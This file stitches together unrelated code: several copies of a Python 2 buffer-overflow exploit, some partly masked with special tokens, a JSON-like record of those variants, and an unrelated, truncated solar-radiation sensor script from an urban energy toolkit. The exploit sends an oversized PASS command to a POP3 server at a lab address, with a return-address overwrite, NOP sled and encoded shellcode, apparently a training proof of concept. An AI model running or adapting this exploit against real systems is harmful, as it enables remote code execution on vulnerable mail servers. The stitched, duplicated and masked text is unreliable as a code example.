shellcode_calc += b'\xa8G\xc9{\x1ex~1\xa3\xf3'
shellcode_calc += b'\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80'
shellcode_calc += b'\x048L\xb9\x0c"\x91\x84\xc7\xd9'
shellcode_calc += b'ar\xd6\x0b\xb8{uru\x8e'
shellcode_calc += b'\x87\xb2\xb1q\xf2\xca\xc2\x0c\x05\t'
shellcode_calc += b'\xb9\xca\x80\x8a\x19\x983w\x98M'
shellcode_calc += b'\xa5\xfc\x96:\xa1[\xba\xbdf\xd0'
shellcode_calc += b'\xc66\x897O\x0c\xae\x93\x14\xd6'
shellcode_calc += b'\xcf\x82\xf0\xb9\xf0\xd5[eU\x9d'
shellcode_calc += b'qr\xe4\xfc\x1f\x85z{m\x85'
shellcode_calc += b'\x84\x84\xc1\xee\xb5\x0f\x8eiJ\xda'
shellcode_calc += b'\xeb\x96\xa8\xcf\x01?u\x9a\xa8"'
shellcode_calc += b'\x86p\xeeZ\x05q\x8e\x98\x15\xf0'
shellcode_calc += b'\x8b\xe5\x91\xe8\xe1vt\x0fVv'
shellcode_calc += b']a=\xfc~\x0b\xce\x99\x0c\xd3'
shellcode_calc += b'\x1f\x03\x95w\x7f\xa54\x13\x1a\t'
shellcode_calc += b'\xd1\x82\x8f,/5.\xdc<\xb5'
<|reserved_special_token_0|>
buf += 'A' * (offset_srp - len(buf))
buf += struct.pack('<I', jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += 'D' * (buf_totlen - len(buf))
<|reserved_special_token_0|>
s.send('USER username' + '\r\n')
<|reserved_special_token_0|>
s.send('PASS ' + buf + '\r\n')
<|reserved_special_token_0|>
s.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
RHOST = '10.10.10.2'
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
jmp_esp = 1598698895
nop_sled = '\x90' * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b''
shellcode_calc += b'\xba\xd5\x90\xd2}\xdb\xd5\xd9t$'
shellcode_calc += b'\xf4X1\xc9\xb161P\x13\x83'
shellcode_calc += b"\xe8\xfc\x03P\xdar'\x81\x0c\xf0"
shellcode_calc += b'\xc8z\xcc\x95A\x9f\xfd\x956\xeb'
shellcode_calc += b'\xad%<\xb9A\xcd\x10*\xd2\xa3'
shellcode_calc += b'\xbc]S\t\x9bPd"\xdf\xf3'
shellcode_calc += b'\xe69\x0c\xd4\xd7\xf1A\x15\x10\xef'
shellcode_calc += b'\xa8G\xc9{\x1ex~1\xa3\xf3'
shellcode_calc += b'\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80'
shellcode_calc += b'\x048L\xb9\x0c"\x91\x84\xc7\xd9'
shellcode_calc += b'ar\xd6\x0b\xb8{uru\x8e'
shellcode_calc += b'\x87\xb2\xb1q\xf2\xca\xc2\x0c\x05\t'
shellcode_calc += b'\xb9\xca\x80\x8a\x19\x983w\x98M'
shellcode_calc += b'\xa5\xfc\x96:\xa1[\xba\xbdf\xd0'
shellcode_calc += b'\xc66\x897O\x0c\xae\x93\x14\xd6'
shellcode_calc += b'\xcf\x82\xf0\xb9\xf0\xd5[eU\x9d'
shellcode_calc += b'qr\xe4\xfc\x1f\x85z{m\x85'
shellcode_calc += b'\x84\x84\xc1\xee\xb5\x0f\x8eiJ\xda'
shellcode_calc += b'\xeb\x96\xa8\xcf\x01?u\x9a\xa8"'
shellcode_calc += b'\x86p\xeeZ\x05q\x8e\x98\x15\xf0'
shellcode_calc += b'\x8b\xe5\x91\xe8\xe1vt\x0fVv'
shellcode_calc += b']a=\xfc~\x0b\xce\x99\x0c\xd3'
shellcode_calc += b'\x1f\x03\x95w\x7f\xa54\x13\x1a\t'
shellcode_calc += b'\xd1\x82\x8f,/5.\xdc<\xb5'
buf = ''
buf += 'A' * (offset_srp - len(buf))
buf += struct.pack('<I', jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += 'D' * (buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close()
<|reserved_special_token_1|>
import socket
import struct
RHOST = '10.10.10.2'
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
jmp_esp = 1598698895
nop_sled = '\x90' * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b''
shellcode_calc += b'\xba\xd5\x90\xd2}\xdb\xd5\xd9t$'
shellcode_calc += b'\xf4X1\xc9\xb161P\x13\x83'
shellcode_calc += b"\xe8\xfc\x03P\xdar'\x81\x0c\xf0"
shellcode_calc += b'\xc8z\xcc\x95A\x9f\xfd\x956\xeb'
shellcode_calc += b'\xad%<\xb9A\xcd\x10*\xd2\xa3'
shellcode_calc += b'\xbc]S\t\x9bPd"\xdf\xf3'
shellcode_calc += b'\xe69\x0c\xd4\xd7\xf1A\x15\x10\xef'
shellcode_calc += b'\xa8G\xc9{\x1ex~1\xa3\xf3'
shellcode_calc += b'\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80'
shellcode_calc += b'\x048L\xb9\x0c"\x91\x84\xc7\xd9'
shellcode_calc += b'ar\xd6\x0b\xb8{uru\x8e'
shellcode_calc += b'\x87\xb2\xb1q\xf2\xca\xc2\x0c\x05\t'
shellcode_calc += b'\xb9\xca\x80\x8a\x19\x983w\x98M'
shellcode_calc += b'\xa5\xfc\x96:\xa1[\xba\xbdf\xd0'
shellcode_calc += b'\xc66\x897O\x0c\xae\x93\x14\xd6'
shellcode_calc += b'\xcf\x82\xf0\xb9\xf0\xd5[eU\x9d'
shellcode_calc += b'qr\xe4\xfc\x1f\x85z{m\x85'
shellcode_calc += b'\x84\x84\xc1\xee\xb5\x0f\x8eiJ\xda'
shellcode_calc += b'\xeb\x96\xa8\xcf\x01?u\x9a\xa8"'
shellcode_calc += b'\x86p\xeeZ\x05q\x8e\x98\x15\xf0'
shellcode_calc += b'\x8b\xe5\x91\xe8\xe1vt\x0fVv'
shellcode_calc += b']a=\xfc~\x0b\xce\x99\x0c\xd3'
shellcode_calc += b'\x1f\x03\x95w\x7f\xa54\x13\x1a\t'
shellcode_calc += b'\xd1\x82\x8f,/5.\xdc<\xb5'
buf = ''
buf += 'A' * (offset_srp - len(buf))
buf += struct.pack('<I', jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += 'D' * (buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close()
<|reserved_special_token_1|>
#!/usr/bin/env python2
import socket
import struct
RHOST = "10.10.10.2"
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
# OFFSETS
# EIP 4654
# ESP 342
# EBP 4650
# jmp_esp in slmfc.dll at 5f4a358f
jmp_esp = 0x5f4a358f
nop_sled = "\x90" * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b""
shellcode_calc += b"\xba\xd5\x90\xd2\x7d\xdb\xd5\xd9\x74\x24"
shellcode_calc += b"\xf4\x58\x31\xc9\xb1\x36\x31\x50\x13\x83"
shellcode_calc += b"\xe8\xfc\x03\x50\xda\x72\x27\x81\x0c\xf0"
shellcode_calc += b"\xc8\x7a\xcc\x95\x41\x9f\xfd\x95\x36\xeb"
shellcode_calc += b"\xad\x25\x3c\xb9\x41\xcd\x10\x2a\xd2\xa3"
shellcode_calc += b"\xbc\x5d\x53\x09\x9b\x50\x64\x22\xdf\xf3"
shellcode_calc += b"\xe6\x39\x0c\xd4\xd7\xf1\x41\x15\x10\xef"
shellcode_calc += b"\xa8\x47\xc9\x7b\x1e\x78\x7e\x31\xa3\xf3"
shellcode_calc += b"\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80"
shellcode_calc += b"\x04\x38\x4c\xb9\x0c\x22\x91\x84\xc7\xd9"
shellcode_calc += b"\x61\x72\xd6\x0b\xb8\x7b\x75\x72\x75\x8e"
shellcode_calc += b"\x87\xb2\xb1\x71\xf2\xca\xc2\x0c\x05\x09"
shellcode_calc += b"\xb9\xca\x80\x8a\x19\x98\x33\x77\x98\x4d"
shellcode_calc += b"\xa5\xfc\x96\x3a\xa1\x5b\xba\xbd\x66\xd0"
shellcode_calc += b"\xc6\x36\x89\x37\x4f\x0c\xae\x93\x14\xd6"
shellcode_calc += b"\xcf\x82\xf0\xb9\xf0\xd5\x5b\x65\x55\x9d"
shellcode_calc += b"\x71\x72\xe4\xfc\x1f\x85\x7a\x7b\x6d\x85"
shellcode_calc += b"\x84\x84\xc1\xee\xb5\x0f\x8e\x69\x4a\xda"
shellcode_calc += b"\xeb\x96\xa8\xcf\x01\x3f\x75\x9a\xa8\x22"
shellcode_calc += b"\x86\x70\xee\x5a\x05\x71\x8e\x98\x15\xf0"
shellcode_calc += b"\x8b\xe5\x91\xe8\xe1\x76\x74\x0f\x56\x76"
shellcode_calc += b"\x5d\x61\x3d\xfc\x7e\x0b\xce\x99\x0c\xd3"
shellcode_calc += b"\x1f\x03\x95\x77\x7f\xa5\x34\x13\x1a\x09"
shellcode_calc += b"\xd1\x82\x8f\x2c\x2f\x35\x2e\xdc\x3c\xb5"
buf = ""
buf += "A" * (offset_srp - len(buf))
buf += struct.pack("<I", jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += "D"*(buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close()
|
flexible
|
{
"blob_id": "280a4e1fb35937bb5a5c604f69337d30a4b956a9",
"index": 6302,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ns.connect((RHOST, RPORT))\n<mask token>\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\n<mask token>\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\n<mask token>\ns.send('USER username' + '\\r\\n')\n<mask token>\ns.send('PASS ' + buf + '\\r\\n')\n<mask token>\ns.close\n",
"step-3": "<mask token>\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-4": "import socket\nimport struct\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-5": "#!/usr/bin/env python2\n\nimport socket\nimport struct\n\nRHOST = \"10.10.10.2\"\nRPORT = 110\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\n\n# OFFSETS\n# EIP 4654\n# ESP 342\n# EBP 4650\n# jmp_esp in slmfc.dll at 5f4a358f\njmp_esp = 0x5f4a358f\nnop_sled = \"\\x90\" * 32\n\nbuf_totlen = 5000\noffset_srp = 4654\n\nshellcode_calc = b\"\"\nshellcode_calc += b\"\\xba\\xd5\\x90\\xd2\\x7d\\xdb\\xd5\\xd9\\x74\\x24\"\nshellcode_calc += b\"\\xf4\\x58\\x31\\xc9\\xb1\\x36\\x31\\x50\\x13\\x83\"\nshellcode_calc += b\"\\xe8\\xfc\\x03\\x50\\xda\\x72\\x27\\x81\\x0c\\xf0\"\nshellcode_calc += b\"\\xc8\\x7a\\xcc\\x95\\x41\\x9f\\xfd\\x95\\x36\\xeb\"\nshellcode_calc += b\"\\xad\\x25\\x3c\\xb9\\x41\\xcd\\x10\\x2a\\xd2\\xa3\"\nshellcode_calc += b\"\\xbc\\x5d\\x53\\x09\\x9b\\x50\\x64\\x22\\xdf\\xf3\"\nshellcode_calc += b\"\\xe6\\x39\\x0c\\xd4\\xd7\\xf1\\x41\\x15\\x10\\xef\"\nshellcode_calc += b\"\\xa8\\x47\\xc9\\x7b\\x1e\\x78\\x7e\\x31\\xa3\\xf3\"\nshellcode_calc += b\"\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80\"\nshellcode_calc += b\"\\x04\\x38\\x4c\\xb9\\x0c\\x22\\x91\\x84\\xc7\\xd9\"\nshellcode_calc += b\"\\x61\\x72\\xd6\\x0b\\xb8\\x7b\\x75\\x72\\x75\\x8e\"\nshellcode_calc += b\"\\x87\\xb2\\xb1\\x71\\xf2\\xca\\xc2\\x0c\\x05\\x09\"\nshellcode_calc += b\"\\xb9\\xca\\x80\\x8a\\x19\\x98\\x33\\x77\\x98\\x4d\"\nshellcode_calc += b\"\\xa5\\xfc\\x96\\x3a\\xa1\\x5b\\xba\\xbd\\x66\\xd0\"\nshellcode_calc += b\"\\xc6\\x36\\x89\\x37\\x4f\\x0c\\xae\\x93\\x14\\xd6\"\nshellcode_calc += b\"\\xcf\\x82\\xf0\\xb9\\xf0\\xd5\\x5b\\x65\\x55\\x9d\"\nshellcode_calc += b\"\\x71\\x72\\xe4\\xfc\\x1f\\x85\\x7a\\x7b\\x6d\\x85\"\nshellcode_calc += b\"\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8e\\x69\\x4a\\xda\"\nshellcode_calc += b\"\\xeb\\x96\\xa8\\xcf\\x01\\x3f\\x75\\x9a\\xa8\\x22\"\nshellcode_calc += b\"\\x86\\x70\\xee\\x5a\\x05\\x71\\x8e\\x98\\x15\\xf0\"\nshellcode_calc += b\"\\x8b\\xe5\\x91\\xe8\\xe1\\x76\\x74\\x0f\\x56\\x76\"\nshellcode_calc += b\"\\x5d\\x61\\x3d\\xfc\\x7e\\x0b\\xce\\x99\\x0c\\xd3\"\nshellcode_calc += b\"\\x1f\\x03\\x95\\x77\\x7f\\xa5\\x34\\x13\\x1a\\x09\"\nshellcode_calc += b\"\\xd1\\x82\\x8f\\x2c\\x2f\\x35\\x2e\\xdc\\x3c\\xb5\"\n\nbuf = \"\"\nbuf += \"A\" * (offset_srp - len(buf))\nbuf += struct.pack(\"<I\", jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += \"D\"*(buf_totlen - len(buf))\n\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
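One detail in the record above worth spelling out: struct.pack('<I', jmp_esp) serializes the saved-return-pointer overwrite as four little-endian bytes, which is why the address 0x5f4a358f can be written in its natural reading order in the script. A standalone Python 3 illustration, standard library only (the original record is Python 2, where the packed value concatenates directly onto a str buffer):

import struct

jmp_esp = 0x5f4a358f
srp = struct.pack('<I', jmp_esp)
print(srp)              # b'\x8f5J_' -> bytes 8f 35 4a 5f, least significant first
print(srp[::-1].hex())  # '5f4a358f', the address back in its familiar spelling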
import json
import os
import numpy as np
import pandas as pd
import py4design.py2radiance as py2radiance
import py4design.py3dmodel.calculate as calculate
from py4design import py3dmodel
__author__ = "Jimeno A. Fonseca"
__copyright__ = "Copyright 2017, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Jimeno A. Fonseca", "Kian Wee Chen"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "[email protected]"
__status__ = "Production"
from cea.constants import HOURS_IN_YEAR
from cea.resources.radiation_daysim.geometry_generator import BuildingGeometry
from cea import suppress_3rd_party_debug_loggers
suppress_3rd_party_debug_loggers()
def create_sensor_input_file(rad, chunk_n):
sensor_file_path = os.path.join(rad.data_folder_path, "points_" + str(chunk_n) + ".pts")
sensor_file = open(sensor_file_path, "w")
sensor_pts_data = py2radiance.write_rad.sensor_file(rad.sensor_positions, rad.sensor_normals)
sensor_file.write(sensor_pts_data)
sensor_file.close()
rad.sensor_file_path = sensor_file_path
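# Format note, for orientation only: the .pts file written above follows the
# Radiance/Daysim sensor-point convention of one 'x y z xdir ydir zdir' record
# per line, so a two-sensor file would look roughly like (made-up values):
#   0.0 0.0 3.0  0.0  0.0  1.0
#   2.0 0.0 1.5  0.0 -1.0  0.0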
def generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type, orientation, normal, intersection):
mid_pt = py3dmodel.calculate.face_midpt(occface)
location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)
moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(mid_pt, location_pt, occface))
if srf_type == 'roofs':
xdim = ydim = roof_dim
else:
xdim = ydim = wall_dim
    # subdivide the offset (OpenCASCADE) face into a grid of sensor surfaces
sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)
# calculate list of properties per surface
sensor_intersection = [intersection for x in sensor_surfaces]
sensor_dir = [normal for x in sensor_surfaces]
sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]
sensor_type = [srf_type for x in sensor_surfaces]
sensor_orientation = [orientation for x in sensor_surfaces]
sensor_area = [calculate.face_area(x) * (1.0 - scalar) for x, scalar in zip(sensor_surfaces, sensor_intersection)]
return sensor_dir, sensor_cord, sensor_type, sensor_area, sensor_orientation, sensor_intersection
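# Worked example of the subdivision above, with made-up numbers: a 6 m x 3 m
# wall and grid_size['walls_grid'] = 2 yields a face nudged 0.01 m along its
# normal and gridded into roughly 2 m x 2 m cells (about 3 x 2 = 6 sensors);
# each sensor inherits the parent face's normal, type and orientation, and its
# area is scaled by (1 - intersection) so shared party-wall fractions drop out.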
def calc_sensors_building(building_geometry, grid_size):
sensor_dir_list = []
sensor_cord_list = []
sensor_type_list = []
sensor_area_list = []
sensor_orientation_list = []
sensor_intersection_list = []
surfaces_types = ['walls', 'windows', 'roofs']
sensor_vertical_grid_dim = grid_size["walls_grid"]
sensor_horizontal_grid_dim = grid_size["roof_grid"]
for srf_type in surfaces_types:
occface_list = getattr(building_geometry, srf_type)
if srf_type == 'roofs':
orientation_list = ['top'] * len(occface_list)
normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)
interesection_list = [0] * len(occface_list)
elif srf_type == 'windows':
orientation_list = getattr(building_geometry, "orientation_{srf_type}".format(srf_type=srf_type))
normals_list = getattr(building_geometry, "normals_{srf_type}".format(srf_type=srf_type))
interesection_list = [0] * len(occface_list)
else:
orientation_list = getattr(building_geometry, "orientation_{srf_type}".format(srf_type=srf_type))
normals_list = getattr(building_geometry, "normals_{srf_type}".format(srf_type=srf_type))
interesection_list = getattr(building_geometry, "intersect_{srf_type}".format(srf_type=srf_type))
for orientation, normal, face, intersection in zip(orientation_list, normals_list, occface_list,
interesection_list):
sensor_dir, \
sensor_cord, \
sensor_type, \
sensor_area, \
sensor_orientation, \
sensor_intersection = generate_sensor_surfaces(face,
sensor_vertical_grid_dim,
sensor_horizontal_grid_dim,
srf_type,
orientation,
normal,
intersection)
sensor_intersection_list.extend(sensor_intersection)
sensor_dir_list.extend(sensor_dir)
sensor_cord_list.extend(sensor_cord)
sensor_type_list.extend(sensor_type)
sensor_area_list.extend(sensor_area)
sensor_orientation_list.extend(sensor_orientation)
return sensor_dir_list, sensor_cord_list, sensor_type_list, sensor_area_list, sensor_orientation_list, sensor_intersection_list
def calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):
sensors_coords_zone = []
sensors_dir_zone = []
sensors_total_number_list = []
names_zone = []
sensors_code_zone = []
sensor_intersection_zone = []
for building_name in building_names:
building_geometry = BuildingGeometry.load(os.path.join(geometry_pickle_dir, 'zone', building_name))
# get sensors in the building
sensors_dir_building, \
sensors_coords_building, \
sensors_type_building, \
sensors_area_building, \
sensor_orientation_building, \
sensor_intersection_building = calc_sensors_building(building_geometry, grid_size)
        # get the total number of sensors and store in a list
sensors_number = len(sensors_coords_building)
sensors_total_number_list.append(sensors_number)
sensors_code = ['srf' + str(x) for x in range(sensors_number)]
sensors_code_zone.append(sensors_code)
# get the total list of coordinates and directions to send to daysim
sensors_coords_zone.extend(sensors_coords_building)
sensors_dir_zone.extend(sensors_dir_building)
# get total list of intersections
sensor_intersection_zone.append(sensor_intersection_building)
# get the name of all buildings
names_zone.append(building_name)
# save sensors geometry result to disk
pd.DataFrame({'BUILDING': building_name,
'SURFACE': sensors_code,
'orientation': sensor_orientation_building,
'intersection': sensor_intersection_building,
'Xcoor': [x[0] for x in sensors_coords_building],
'Ycoor': [x[1] for x in sensors_coords_building],
'Zcoor': [x[2] for x in sensors_coords_building],
'Xdir': [x[0] for x in sensors_dir_building],
'Ydir': [x[1] for x in sensors_dir_building],
'Zdir': [x[2] for x in sensors_dir_building],
'AREA_m2': sensors_area_building,
'TYPE': sensors_type_building}).to_csv(locator.get_radiation_metadata(building_name), index=None)
return sensors_coords_zone, sensors_dir_zone, sensors_total_number_list, names_zone, sensors_code_zone, sensor_intersection_zone
def isolation_daysim(chunk_n, cea_daysim, building_names, locator, radiance_parameters, write_sensor_data, grid_size,
max_global, weatherfile, geometry_pickle_dir):
# initialize daysim project
daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.format(n=chunk_n))
print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=daysim_project.project_path))
# calculate sensors
print("Calculating and sending sensor points")
sensors_coords_zone, \
sensors_dir_zone, \
sensors_number_zone, \
names_zone, \
sensors_code_zone, \
sensor_intersection_zone = calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir)
num_sensors = sum(sensors_number_zone)
daysim_project.create_sensor_input_file(sensors_coords_zone, sensors_dir_zone, num_sensors, "w/m2")
print("Starting Daysim simulation for buildings: {buildings}".format(buildings=names_zone))
print("Total number of sensors: {num_sensors}".format(num_sensors=num_sensors))
print('Writing radiance parameters')
daysim_project.write_radiance_parameters(radiance_parameters["rad_ab"], radiance_parameters["rad_ad"],
radiance_parameters["rad_as"], radiance_parameters["rad_ar"],
radiance_parameters["rad_aa"], radiance_parameters["rad_lr"],
radiance_parameters["rad_st"], radiance_parameters["rad_sj"],
